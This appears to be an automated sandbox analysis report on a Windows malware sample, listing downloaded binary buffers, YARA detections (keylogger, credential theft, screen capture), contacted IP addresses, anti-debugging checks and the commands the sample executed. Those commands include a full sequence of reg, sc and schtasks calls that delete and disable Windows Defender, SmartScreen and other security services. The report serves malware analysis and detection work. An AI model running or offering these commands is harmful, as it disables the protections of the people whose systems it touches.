InternetReadFile May 4, 2025, 12:47 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd\|%hð"èx@paz`p(`ð(&p @X¡À.textçè `.rdataÂÄð@@.data8,Ð´@À.pdataÄ@@.OLM à `.gxfgp0æ@@.retplnePü_RDATAô`þ@@.relocp@B.bsshh@À.bsshð hp @À.rsrcð`Ø@@AWAVAUATVWUSHìxÖHÏHäÁH1àHD$p3qèHD$(HGHÁHÁéL$0àA¹Èª&1ÒA¼mÊ¥AºL3A»ñ«l½,RÆd¹n{A¾]æ]Aùû¶IGéÅÎ{ÿ¯û@öÇA¹¿é'¿/ßrDDÏ=óÍ DLÏf.Aùû¶IAù®L&Aù+RÆdAùð«lwAù,RÆdÀAùÕ"hiêAùÁßiu©Í{ÿ¯û@öÇA¹ÌDDÉ=lÍ DLÉAùû¶If.Aùß´ÑAù0Ñ«AùÚvÌ»RAù1Ñ««AùA®¶AùoÏ¤µ"ÿÿÿHc\$dH\|$(i<éÑ[ûÁë1ûiÛéÑ[i\|$`éÑ[1ß\|$L\$dÃ\$PÅÌ{ÿ¯û@öÇA¹É¦n¿¯çÞÓé±þÿÿf.AùÈª&±AùL3öAùÈª&=Aùgù3'WAù³þ1þÿÿH\$@HûA¹×2<å¿ÛvÌ»DDÏE1íAùû¶IdþÿÿéâþÿÿfAùdèAùõrã ÍAùdèAùR»ý1AùþÿÿH\$8¾3\$liÛéÑ[3\$`\$\ÏË{ÿ¯û@öÇA¹"Øt¼¿7qÞé»ýÿÿAùCL>\ËAùDL>\ÿAù]æ] Aùäc¡ýÿÿH\$8¾[Áã3\$h\$XgË{ÿ¯û@öÇA¹»¬>EDÊ=PË ELÊAùû¶IhýÿÿéæýÿÿAùlÊ¥AùmÊ¥ÏAùn{ßAùÈèOª"ýÿÿüÊ{ÿ¯û@öÇA¹É¦n¿oÏ¤µéèüÿÿAù¢}Aù ¢¸Aù7qÞ¦üÿÿAùÌÎüÿÿA¹ÁßiAùû¶IÈüÿÿéFýÿÿAùLÞpAùMÞAù×2<å°AùðBçüÿÿH\$@HûA¹ ¢»ì DLËE1ÀAùû¶IgüÿÿéåüÿÿAùñ«lAùÉ¦nAù/ßr.üÿÿÊ{ÿ¯û@öÇA¹ü¶IEDÎ=ñÉ ELÎAùû¶I üÿÿéüÿÿAùÛvÌ»ºAù"Øt¼ÒAùè ÒÀÐûÿÿªÉ{ÿ¯û@öÇA¹MÞ¿!¥>éûÿÿAùL3ñAù!¥>AùÆûJûÿÿcÉ{ÿ¯û@öÇA¹1Ñ«¿örã éOûÿÿAùörã ÿAùãÃ[ Aù¿é'BûÿÿH\$8\$l\$l\$l\$l\$l\$l\$l\$l\$l\$`A¹gù3'Aùû¶IûÿÿéûÿÿAù®L9Aù2«Wãúÿÿ\$0\$dA¹R»ýAùû¶IÕúÿÿéSûÿÿAù3.Aù»¬>©úÿÿH\$8\$h\$h\$h\$h\$hA¹äcAùû¶IúÿÿéûÿÿAùü¶I\|Aùì ^úÿÿDD$h3È{ÿ¯û@öÇA¹Ì¿ÁßiéúÿÿAùà´ÑUAù¯çÞÓúÿÿt$LT$PA¹Èª&Aùû¶IúÿÿéúÿÿÙÇ{ÿ¯û@öÇA¹DL>\EDË=ÂÇ ELËAùû¶IÚùÿÿéXúÿÿ¢Ç{ÿ¯û@öÇA¹DL>\DDÍ=Ç DLÍAùû¶I£ùÿÿé!úÿÿA¹ÆûJAùû¶Iùÿÿé úÿÿH\$8A¹3.Aùû¶Inùÿÿéìùÿÿt$`T$d=.Ç_ÿ¯ßöÃA¹2«W¿R»ýéùÿÿÇ{ÿ¯û@öÇA¹"Øt¼¿éûøÿÿH\$@HûA¹ðBç¿³þ1DLÏAùû¶Iýøÿÿé{ùÿÿ\$0\|$d9ßD$7¶Æ{ÿ¯û@öÇA¹2«W¿ãÃ[é¢øÿÿA¹,RÆdAùû¶I request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:47 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $DØþe¹6¹6¹6Ò7¹6Ò7¹6Ò7¹6Ò7¹6¹6 ¹6Ò7 ¹6Òo6¹6Ò7¹6Rich¹6PEdøÄ®ð"\|@ àÌ`Á <¢´ðLÑàÐ T( .text{\| `.rdataÈ"$@@.dataÀ¤@À.pdataà¨@@.rsrcàðÒ®@@.reloc Ð@BÌÌÌÌÌÌÌÌE3ÉHBÿAºþÿÿA»WI;ÂEGËEÉxGHÒt"L+ÒL+ÁIHÀtAÀtHÿÁHêuäHÒHAÿHEÁH÷ÚEÉA÷ÑAázÆëHÒtÆAÁÃÌÌÌÌÌÌÌÌÌÌE3ÉLÒMØHÑA¸WIBÿH=þÿÿEGÈEÉx5IÊHÂMÒt8t HÿÀHéuòHÁH÷ØEÉA÷ÑE#ÈHÉtMÂL+ÁëE3ÀEÉxXIÊII+Èt.HÁMþÿÿI+ÂLÈL+ÚMÉtAÀtIÿÉHÿÂHéuåHÉHBÿHEÂH÷ÙEÉA÷ÑAázÆAÁÃÌÌÌÌÌÌÌÌÌÌLD$LL$ SVWHì 3ÿHBÿH=þÿÿHñ¹WGùÿx;HZÿHÎHÓLL$X3ÿHÿDÀxHH;Ãwu@<3ë@<3¿zëHÒtÆÇHÄ _^[ÃÌÌÌÌÌÌÌH\$Hl$VWAVHìH ®H3ÄHD$pLñfÇD$l3íH ýl$hHÿDHØHÀHðHÈHÿ.DHðHÀtmHD$`A.HD$PDE l$HHL$hl$@}l$8A¹ l$0²l$(l$ Hÿñ~DÀt$HT$`MÆ3ÉHÆÿµHL$`Hÿ¡~DHËHÿÊDÇHL$pH3Ìè¦qL$I[(Ik0IãA^_^ÃÌÌÌÌÌÌÌÌÌÌHÄHXHpHxLp UHh¡HìHö¬H3ÄHEG-®E3öDu?fÇECDu'A^;ÃHM'èþÿÿÀhHÿDHÈLE/SHÿæ}DÀWHM/HE+E3ÉHD$ E3ÀÓHÿ}DÀHÿY~DøzëU+3ÉHÿDHøHÀÎDM+HE+HM/LÇÓHD$ Hÿ9}DÀHE7A¹ HD$PHM?Dt$HA¸ Dt$@ÓDt$8Dt$0Dt$(Dt$ Hÿ4}DÀtLAöD97v4»HU7ÎHÉHLÏHÿ}DÀuó;7rÜë Î¬]'HM7Hÿ¼\|DHÏHÿÕ}DHM/Hÿ}DE'ë ¬»E'ÀEË ~¬HMGH3ÌèoL$I[IsI{ Ms(Iã]ÃÌÌÌÌÌÌÌÌÌH\$WHì0HôªH3ÄH$ IùIÀHÙêt'úuIÀÃ÷ÿÿIøwHÐHÿôDëh3ÀëiHÿ DHÐHËèú6H ûÈLD$ A¹ÆD$ ×Hÿ¢DLD$ º?HËHÿ±DÉÿHÿD¸H$ H3Ìè nH$HHÄ0_ÃÌÌÌÌÌÌÌH\$Hl$Ht$WHì HHòHù3íë@8+tjHÿÃ¾HÎèÌfHÀuè¾HÎHè¹fHÀuHû?tHÿÇHÎÿÅ¾èfHÀtæHcÅHÃ8tÆHÿÀH\$0Hl$8Ht$@HÄ _ÃÌ3ÀëæÌÌÌÌÌÌÌÌH\$UVWATAUAVAWH¬$úÿÿHìpH^©H3ÄH`LñHEPMÖHMPL+ÐMùE3íMàºHúþÿHÀtA ÀtHÿÁHêuáHÒHAÿHEÁD(}P"u H#HEQëHHEPHL$0HD$0è»þÿÿH\|$0HËÿHðHÿtlHÃHÿÀD8,u÷HørZG±\<:u8Ot8uH:ÁuDHD$@LÇL+ÀHL$@ºHúþÿHÀtAÀtHÿÁHêuáHÒHAÿHEÁD(ëZA¹LY¾HD$@AÑL+ÀHL$@HúþÿHÀtAÀtHÿÁHêuáHÒHAÿLÇAÑHEÁHL$@D(è¤cº.HÏèWeHÀH \$(ºHL$ DËLÀJ~Hÿ¹yDøÎHL$@Hÿ¯yDøÿÁè÷Ðà~HÄ~Ht$0HL$0è]ýÿÿHÈHÀt"D8)H§~HD$0HEÁHL$0HD$0è3ýÿÿº¹@Hÿ{DHØHÀËHt$0H=E¨HÏLL$@HV~D8.HEÎE3ÀHÿyDLËAÇ(¼Lá}HD$@HD$(H ~H )~ÇD$ HÿZyDÀt5 ÅºD8.IÎHEþLÇèöÿÿLD$@ºHËèöÿÿéM%ÙÄûfD9-åÄu%A¸HT$@HL$@L5¼}HÿEzDëL5·}D8.HD$@HD$(L§HEþMÎºH\|$ HËè^÷ÿÿéÞE3ÉLD$@º%Dl$(3ÉÇD$ è¸33Àé¿º.HÏè@cHÀHP}\$(HT$ DËºLÀJ~Hÿ¢wDøukH5Ñ¦HÃHÿÀD8,u÷HL$@HÿÃD8,u÷H<¹@HWHÿ3yDHØHÀuE3ÉºµE3ÀéNÿÿÿLL$@LÆHWHÈèöÿÿé¿¹@×HÿêxDHØHÀt·HL$@HÿwDøÿt}¨uyLD$@×H`L+ÀH`HþûÿHÀtBÀtHÿÁHêuáHÒHAÿHEÁD(HötmD8.thLÙ{H×H`èõÿÿLÆH`H×èõÿÿë>H`L+ðH`HþûÿHÀtB2ÀtHÿÂHïuáHÿHJÿHEÊD)LÃD+HÓH`èI$¸H`H3ÌèhH$¸HÄpA_A^A]A\ request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:47 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ö¶BS×,×,×,¼/×,¼)(×,À¢(×,À¢/×,À¢)Ë×,£Ñ×,¼(×,¼-×,×-b×,^¢%×,^¢Ó×,^¢.×,Rich×,PEL÷áhàÚâ:ð@@°È à°ðAüÀ8Â8Á@ð0.textúÙÚ `.rdatax8ð:Þ@@.dataôc0"@À.rsrcà :@@.relocðA°B<@Bhà²DèyYÃÌÌÌÌh²DèyYÃÌÌÌÌj hÔ¯E¹d>FèOh@³DèiyYÃÌÌÌj hø¯E¹DFè/h ³DèIyYÃÌÌÌjh°E¹TEFèh´Dè)yYÃÌÌÌj h$°E¹´?Fèïh`´Dè yYÃÌÌÌjhH°E¹LDFèÏhÀ´DèéxYÃÌÌÌjh\°E¹=Fè¯h µDèÉxYÃÌÌÌjh{®E¹$EFèhµDè©xYÃÌÌÌjh{®E¹EFèohàµDèxYÃÌÌÌjh{®E¹Ì?FèOh@¶DèixYÃÌÌÌjh{®E¹=Fè/h ¶DèIxYÃÌÌÌjh\|°E¹>Fèh·Dè)xYÃÌÌÌjh°E¹8HFèïh`·Dè xYÃÌÌÌjh°E¹ÜDFèÏhÀ·DèéwYÃÌÌÌjh °E¹l<Fè¯h ¸DèÉwYÃÌÌÌjh¬°E¹\|DFèh¸Dè©wYÃÌÌÌjhÀ°E¹\@Fèohà¸DèwYÃÌÌÌjDhÐ°E¹ØGFèOh@¹DèiwYÃÌÌÌj\h±E¹T?Fè/h ¹DèIwYÃÌÌÌjhx±E¹t@FèhºDè)wYÃÌÌÌjh±E¹<Fèïh`ºDè wYÃÌÌÌjh±E¹BFèÏhÀºDèévYÃÌÌÌj<h¬±E¹Ü;Fè¯h »DèÉvYÃÌÌÌjhì±E¹Ä;Fèh»Dè©vYÃÌÌÌjhü±E¹HFèohà»DèvYÃÌÌÌjXh²E¹LAFèOh@¼DèivYÃÌÌÌjhl²E¹°HFè/h ¼DèIvYÃÌÌÌjh²E¹DFFèh½Dè)vYÃÌÌÌjh²E¹ÀGFèïh`½Dè vYÃÌÌÌjh²E¹ä<FèÏhÀ½DèéuYÃÌÌÌjh¤²E¹TBFè¯h ¾DèÉuYÃÌÌÌjh¬²E¹DCFèh¾Dè©uYÃÌÌÌjh´²E¹ÔCFèohà¾DèuYÃÌÌÌjh¼²E¹<<FèOh@¿DèiuYÃÌÌÌjhÄ²E¹´EFè/h ¿DèIuYÃÌÌÌjhÌ²E¹\|AFèhÀDè)uYÃÌÌÌjhÔ²E¹üBFèïh`ÀDè uYÃÌÌÌjhÜ²E¹BFèÏhÀÀDèétYÃÌÌÌjhä²E¹xGFè¯h ÁDèÉtYÃÌÌÌjhì²E¹¤CFèhÁDè©tYÃÌÌÌjhô²E¹hHFèohàÁDètYÃÌÌÌjhü²E¹<EFèOh@ÂDèitYÃÌÌÌjh³E¹Ì<Fè/h ÂDèItYÃÌÌÌjh³E¹ü<FèhÃDè)tYÃÌÌÌjh(³E¹,=Fèïh`ÃDè tYÃÌÌÌjh8³E¹Ä>FèÏhÀÃDèésYÃÌÌÌjhH³E¹HFè¯h ÄDèÉsYÃÌÌÌjhP³E¹øHFèhÄDè©sYÃÌÌÌjhX³E¹ÌEFèohàÄDèsYÃÌÌÌjh`³E¹¨GFèOh@ÅDèisYÃÌÌÌjhh³E¹>Fè/h ÅDèIsYÃÌÌÌjht³E¹(IFèhÆDè)sYÃÌÌÌjh³E¹\=Fèïh`ÆDè sYÃÌÌÌjh³E¹ì@FèÏhÀÆDèérYÃÌÌÌjh³E¹ì=Fè¯h ÇDèÉrYÃÌÌÌjh¤³E¹$?FèhÇDè©rYÃÌÌÌjh¬³E¹dAFèohàÇDèrYÃÌÌÌjh´³E¹l?FèOh@ÈDèirYÃÌÌÌjh¼³E¹ HFè/h ÈDèIrYÃÌÌÌjhÄ³E¹EFèhÉDè)rYÃÌÌÌjhÐ³E¹L>Fèïh`ÉDè rYÃÌÌÌjhØ³E¹DFèÏhÀÉDèéqYÃÌÌÌjhà³E¹4DFè¯h ÊDèÉqYÃÌÌÌjhð³E¹Ô@FèhÊDè©qYÃÌÌÌjhø³E¹<FèohàÊDèqYÃÌÌÌjh´E¹ÔFFèOh@ËDèiqYÃÌÌÌjh´E¹FFè/h ËDèIqYÃÌÌÌjh´E¹¼@FèhÌDè)qYÃÌÌÌjh´E¹HFèïh`ÌDè qYÃÌÌÌjh0´E¹¤@FèÏhÀÌDèépYÃÌÌÌjhD´E¹GFè¯h ÍDèÉpYÃÌÌÌjhd´E¹@FèhÍDè©pYÃÌÌÌjhx´E¹\|>FèohàÍDèpYÃÌÌÌjh´E¹dDFèOh@ÎDèipYÃÌÌÌjh´E¹ôAFè/h ÎDèIpYÃÌÌÌjh´´E¹@IFèhÏDè)pYÃÌÌÌjhÀ´E¹GFèïh`ÏDè pYÃÌÌÌjhØ´E¹T<FèÏhÀÏDèéoYÃÌÌÌjhì´E¹?Fè¯h ÐDèÉoYÃÌÌÌjhô´E¹AFèhÐDè©oYÃÌÌÌjhµE¹Ü>FèohàÐDèoYÃÌÌÌjh$µE¹AFèOh@ÑDèioYÃÌÌÌjh0µE¹BFè/h ÑDèIoYÃÌÌÌjh<µE¹¼FFèhÒDè)oYÃÌÌÌjhHµE¹4AFèïh`ÒDè oYÃÌÌÌjh\µE¹ðGFèÏhÀÒDèénYÃÌÌÌjhpµE¹IFè¯h ÓDèÉnYÃÌÌÌjhxµE¹lEFèhÓDè©nYÃÌÌÌj@hµE¹ü?FèohàÓDènYÃÌÌÌjhÄµE¹lBFèOh@ÔDèinYÃÌÌÌjLhÐµE¹ÄAFè/h ÔDèInYÃÌÌÌj<h ¶E¹¤=FèhÕDè)nYÃÌÌÌjh`¶E¹ìCFèïh`ÕDè nYÃÌÌÌjhp¶E¹<BFèÏhÀÕDèémYÃÌÌÌjh\|¶E¹¬AFè¯h ÖDèÉmYÃÌÌÌjh¶E¹DFèhÖDè©mYÃÌÌÌ request_handle: 0x00cc000c	1	1
InternetReadFile May 4, 2025, 12:47 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd Slhð"8Æ@ ã ``Ë(ð 0 (&lÀ<@Î.text `.rdataÀ0¾@@.data0ðØ@À.pdata æ@@.gxfg0@@@_RDATAp@@.relocl@B.jssxx@À.jssx x @À.rsrcð@@AWAVAUATVWUSHìèHæáH1àH$àuíhÿ¯è@öÅ$aíÃø À$Ø½iAG¸«ÚºDèl$\|½á1¥Dèl$x½Öæs¸Þ$1Dèl$t½É¡Dèl$pA¸ ) ¸ù\¡âDDÀ½7.ÔâDèl$lA¹¢r.ü¸ò'áODDÈAº·}Á&DDÐ½At¸hÛÎóDèl$h½n¡Dèl$dA¼@¡F¸G®DDàA»ó7DDØ½cæ°y¸5Î¥Dèl$`½³YDèl$\½'R^¸ÇRDèl$XT$TIÍ¸"A¾K¬1DD$DDL$@DT$<Dd$8D\$4f.AÇ=ò7~fAÿÇRAÿá©°2ÕAÿ¬"ÒAÿ"DÈAÿ·}Á&t¶DøAÿW\-uªD$,$ÀD$lëfAÿÀÙK¹#Aÿn¡£Aÿá1¥Aÿá1¥SAÿ5Î¥tDøAÿÞ$1?ÿÿÿH$$À$À$À$À$´$´$´$´$´$´$´$´$´¸É¡éÒþÿÿfAÿËÊm$Aÿ_gt.Aÿ`gtæDØAÿcæ°yþÿÿDøAÿÐ£Þ~þÿÿH$ Hø¸ÁÙK¹¹ÁLüõLÁÇD$(écþÿÿAÿ6.ÔâÿAÿÀLüõðAÿÁLüõÅAÿ¢r.üÌDøAÿ¤ÜWþÿÿ¸0Ü$´L$0éþÿÿAÿhAGëAÿiAG¤DøAÿò'áOÝýÿÿ¸·}Á&éÓýÿÿAÿ@tîAÿ¡i2nDøAÿG®©ýÿÿ¸ó7éýÿÿAÿ 'R^AÿÇRDøAÿ³Yuýÿÿ$$¸9Á$D$`éTýÿÿAÿ0ÜñAÿÁÙK¹DøAÿ«Úº*ýÿÿ$Ä$Ä$Ä$Ä$Ä¸á1¥éýüÿÿDàAÿó7íüÿÿDøAÿ ) ÝüÿÿD$péÔüÿÿAÿn¡ADøAÿÉ¡·üÿÿH$¾3$ÀiÀéÑ[3$´$¬D$téüÿÿAÿÌÊmDøAÿÖæsküÿÿ¸0Ü$¬L$0éVüÿÿDÀAÿ7.ÔâFüÿÿDøAÿhÛÎó6üÿÿH$$¼$¼$¼¸n¡éüÿÿAÿâ©°2ÀDøAÿ@¡Fòûÿÿ¼$¸¡i2¹â©°2EÁéØûÿÿDÐAÿAtÈûÿÿDøAÿ¾c¸ûÿÿH$ Hø¸¤ÜW¹W\-DÁÇD$,éûÿÿAÿ'R^DøAÿ{¥°euûÿÿD$$$´D$ $¸D$\éVûÿÿAÿ0ÜqDøAÿù\¡â9ûÿÿ¸7.Ôâé/ûÿÿ$¼$¸ÇR¹`gtEÁÒEÁé ûÿÿ$ÄÁè 3$ÄiÀéÑ[ÁÁé1Á$°D$\|éÛúÿÿ$$¸¸³YéÃúÿÿç çpÿ¯ð@öÆÀ$ßL$Pù Â$ÈÂA»ÊÉDËEEÞA¿ÊÉDË¸MªDEø¿í@¬¸â¨EøIU¸Q¼¹Æf.D=Lª~I=ÉÉDËb=Mª\|=Q¼¹Æuà¶$ß¼$È¸í@¬¹CBEÁÛEÁ=Lª¾=K¬1tN=í@¬tY=â¨ué"fD=ÊÉDËtP=CBuH$Ðø=Lªtÿÿÿë»DØ=Lªdÿÿÿë«¸CB=LªRÿÿÿëDø=LªBÿÿÿë¸Mª=Lª0ÿÿÿétÿÿÿD$($¼D$dé`ùÿÿ request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x004aae00', u'virtual_address': u'0x0000c000', u'entropy': 7.995970593505949, u'name': u'.rsrc', u'virtual_size': u'0x004ab000'}

entropy

7.99597059351

description

A section with a high entropy has been found

entropy

0.993246051538

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (13 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW May 4, 2025, 12:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:39 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:38 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:38 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:38 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (3 events)

url	http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url	http://purl.org/rss/1.0/
url	http://www.passport.com

Yara rule detected in process memory (50 out of 144 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Hijack network configuration	rule	Hijack_Network
description	Record Audio	rule	Sniff_Audio

Queries for potentially installed applications (4 events)

Time & API	Arguments	Return
RegOpenKeyExW May 4, 2025, 12:46 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000101 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1	2
RegOpenKeyExW May 4, 2025, 12:46 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000101 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1	2
RegOpenKeyExW May 4, 2025, 12:46 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000101 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1	2
RegOpenKeyExW May 4, 2025, 12:46 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\MyApp_is1	2

Uses Windows utilities for basic Windows functionality (50 out of 114 events)

cmdline	reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
cmdline	sc delete "MsSecCore"
cmdline	sc delete "wscsvc"
cmdline	reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
cmdline	schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
cmdline	sc config "WdFilter" start= disabled
cmdline	sc delete "WinDefend"
cmdline	reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
cmdline	sc stop "WdFilter"
cmdline	reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f
cmdline	sc delete "WdNisSvc"
cmdline	schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
cmdline	sc stop "SgrmAgent"
cmdline	NSudoLG -U:T -P:E -UseCurrentConsole C:\Users\test22\AppData\Local\Temp\34.bat
cmdline	reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
cmdline	C:\Users\test22\AppData\Local\Temp\34.bat
cmdline	reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
cmdline	tasklist
cmdline	sc stop "webthreatdefsvc"
cmdline	reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f
cmdline	reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
cmdline	sc stop "MsSecWfp"
cmdline	reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
cmdline	reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
cmdline	reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
cmdline	reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
cmdline	schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
cmdline	sc config "Sense" start= disabled
cmdline	reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
cmdline	sc delete "WdNisDrv"
cmdline	reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
cmdline	reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
cmdline	reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
cmdline	sc config "MsSecCore" start= disabled
cmdline	sc config "webthreatdefsvc" start= disabled
cmdline	sc delete "WdBoot"
cmdline	sc stop "SgrmBroker"
cmdline	sc config "WdBoot" start= disabled
cmdline	reg query "HKU\S-1-5-19"
cmdline	sc config "SgrmAgent" start= disabled
cmdline	sc delete "Sense"
cmdline	reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f
cmdline	C:\Windows\system32\cmd.exe /c tasklist
cmdline	sc stop "WdBoot"
cmdline	reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
cmdline	reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f
cmdline	sc stop "MsSecCore"
cmdline	reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
cmdline	reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
cmdline	sc delete "SecurityHealthService"

Communicates with host for which no DNS query was performed (3 events)

host	185.156.72.96
host	80.64.18.219
host	80.64.18.63

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService May 4, 2025, 12:38 p.m.	service_handle: 0x0000000000337330 service_name: None control_code: 1		0	0
ControlService May 4, 2025, 12:38 p.m.	service_handle: 0x0000000000197320 service_name: None control_code: 1		0	0

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 161 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA May 4, 2025, 12:45 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: RegmonClass window_name:		0	0
